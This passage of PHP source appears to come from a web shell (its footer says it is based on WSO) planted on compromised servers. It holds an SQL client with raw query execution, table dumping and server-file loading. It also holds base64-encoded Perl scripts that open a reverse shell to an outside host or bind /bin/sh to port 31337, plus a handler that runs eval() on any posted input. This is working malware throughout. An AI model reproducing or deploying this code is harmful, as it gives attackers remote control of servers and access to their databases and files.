  <th><span>Type</span></th><th><span>Host</span></th><th><span>Username</span></th><th><span>Password</span></th><th><span>Database</span></th>
  <th><input type=checkbox name=sql_count value='on'".(empty($_POST['sql_count'])?'':' checked')."> count the number of rows</th>
  </tr><tr>
  <input type=hidden name=a value=Sql>
  <input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''>
  <input type=hidden name=c value='".htmlspecialchars($GLOBALS['cwd'])."'>
  <input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'')."'>
  <th>
  <select name='type'><option value='mysql' ";
  if(@$_POST['type']=='mysql')echo 'selected';
  echo ">MySQL</option><option value='pgsql' ";
  if(@$_POST['type']=='pgsql')echo 'selected';
  echo ">PostgreSQL</option></select></th>
  <th><input type=text name=sql_host value=\"".(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']))."\"></th>
  <th><input type=text name=sql_login value=\"".(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']))."\"></th>
  <th><input type=text name=sql_pass value=\"".(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']))."\"></th><th>";
  $tmp = "<input type=text name=sql_base value=''>";
  if(isset($_POST['sql_host'])){
    if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])){
      switch($_POST['charset']){
        case "Windows-1251": $db->setCharset('cp1251'); break;
        case "UTF-8": $db->setCharset('utf8'); break;
        case "KOI8-R": $db->setCharset('koi8r'); break;
        case "KOI8-U": $db->setCharset('koi8u'); break;
        case "cp866": $db->setCharset('cp866'); break;
      }
      $db->listDbs();
      echo "<select name=sql_base><option value=''></option>";
      while($item = $db->fetch()){
        list($key, $value) = each($item);
        echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
      }
      echo '</select>';
    }
    else echo $tmp;
  }
  else
  echo $tmp;
  echo "</th>
  <th><input id=return type=submit value='Login' onclick='fs(d.sf);'></th>
  </tr>
  </table>
  <script>
  s_db='".@addslashes($_POST['sql_base'])."';
  function fs(f) {
  if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
  if(f.p1) f.p1.value='';
  if(f.p2) f.p2.value='';
  if(f.p3) f.p3.value='';
  }
  }
  function st(t,l) {
  d.sf.p1.value = 'select';
  d.sf.p2.value = t;
  if(l && d.sf.p3) d.sf.p3.value = l;
  d.sf.submit();
  }
  function is() {
  for(i=0;i<d.sf.elements['tbl[]'].length;++i)
  d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
  }
  </script>";
  if(isset($db) && $db->link){
    echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
    if(!empty($_POST['sql_base'])){
      $db->selectdb($_POST['sql_base']);
      echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
      $tbls_res = $db->listTables();
      while($item = $db->fetch($tbls_res)){
        list($key, $value) = each($item);
        if(!empty($_POST['sql_count']))
        $n     = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
        $value = htmlspecialchars($value);
        echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>".(empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>")."</nobr><br>";
      }
      echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
      if(@$_POST['p1']=='select'){
        $_POST['p1'] = 'query';
        $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
        $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2']);
        $num   = $db->fetch();
        $pages = ceil($num['n'] / 30);
        echo "<script>d.sf.onsubmit=function(){st(\"".$_POST['p2']."\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=".((int)$_POST['p3']).">";
        echo " of $pages";
        if($_POST['p3'] > 1)
        echo " <a href=# onclick='st(\"".$_POST['p2'].'", '.($_POST['p3'] - 1).")'>&lt; Prev</a>";
        if($_POST['p3'] < $pages)
        echo " <a href=# onclick='st(\"".$_POST['p2'].'", '.($_POST['p3'] + 1).")'>Next &gt;</a>";
        $_POST['p3']--;
        if($_POST['type']=='pgsql')
        $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3'] * 30);
        else
        $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3'] * 30).',30';
        echo "<br><br>";
      }
      if((@$_POST['p1']=='query') && !empty($_POST['p2'])){
        $db->query(@$_POST['p2']);
        if($db->res !== false){
          $title = false;
          echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
          $line = 1;
          while($item = $db->fetch()){
            if(!$title){
              echo '<tr>';
              foreach($item as $key => $value)
              echo '<th>'.$key.'</th>';
              reset($item);
              $title = true;
              echo '</tr><tr>';
              $line = 2;
            }
            echo '<tr class="l'.$line.'">';
            $line = $line==1?2:1;
            foreach($item as $key => $value){
              if($value==null)
              echo '<td><i>null</i></td>';
              else
              echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
            }
            echo '</tr>';
          }
          echo '</table>';
        }
        else{
          echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
        }
      }
      echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
      if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
      echo htmlspecialchars($_POST['p2']);
      echo "</textarea><br/><input type=submit value='Execute'>";
      echo "</td></tr>";
    }
    echo "</table></form><br/>";
    if($_POST['type']=='mysql'){
      $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
      if($db->fetch())
      echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='input' type=text name=f><input type=submit value='Go'></form>";
    }
    if(@$_POST['p1']=='loadfile'){
      $file = $db->loadFile($_POST['p2']);
      echo '<br/><pre class=code>'.htmlspecialchars($file['file']).'</pre>';
    }
  }
  else{
    echo htmlspecialchars($db->error());
  }
  mocFooter();
}
function ActionNetwork(){
  mocHeader();
  $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  $bind_port_p    = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  echo "<div id=title><h1>Network Tools</h1></div>
  <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
  <table width=100% cellpadding=3 cellspacing=2><tr>
  <th><span>Bind port to /bin/sh [perl]</span></th><th><span>Port</span></th><td width=60%><input type='text' name='port' value='31337'></td><th><input id=return type=submit value='Run'></th>
  </tr>
  </form>
  <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
  <tr>
  <th><span>Back-connect [perl]</span></span></th><th><span>Server => Port</span></th><td width=60%><input type='text' name='server' value='".$_SERVER['REMOTE_ADDR']."'>
  => <input type='text' name='port' value='31337'></td><th><input id=return type=submit value='Run'></th></tr>
  </form></table>";
  if(isset($_POST['p1'])){
    function cf($f, $t){
      $w = @fopen($f, "w") or @function_exists('file_put_contents');
      if($w){
        @fwrite($w,@base64_decode($t));
        @fclose($w);
      }
    }
    if($_POST['p1']=='bpp'){
      cf("/tmp/bp.pl", $bind_port_p);
      $out = mocCommand("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
      sleep(1);
      echo "<div class=option><pre class=code>$out\n".mocCommand("ps aux | grep bp.pl")."</pre></div>";
      unlink("/tmp/bp.pl");
    }
    if($_POST['p1']=='bcp'){
      cf("/tmp/bc.pl", $back_connect_p);
      $out = mocCommand("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
      sleep(1);
      echo "<div class=option><pre class=code>$out\n".mocCommand("ps aux | grep bc.pl")."</pre></div>";
      unlink("/tmp/bc.pl");
    }
  }
  mocFooter();
}
function ActionRC(){
  if(!@$_POST['p1']){
    $a = array(
      "uname"      => php_uname(),
      "php_version"=> phpversion(),
      "moc_version"=> MOC_VERSION,
      "safemode"   => @ini_get('safe_mode')
    );
    echo serialize($a);
  }
  else{
    eval($_POST['p1']);
  }
}
if(empty($_POST['a']))
if(isset($default_action) && function_exists('Action'.$default_action))
$_POST['a'] = $default_action;
else
$_POST['a'] = 'SecInfo';
if(!empty($_POST['a']) && function_exists('Action'.$_POST['a']))
call_user_func('Action'.$_POST['a']);

##############################
###[ SHELL BASED FROM WSO ]###
##############################
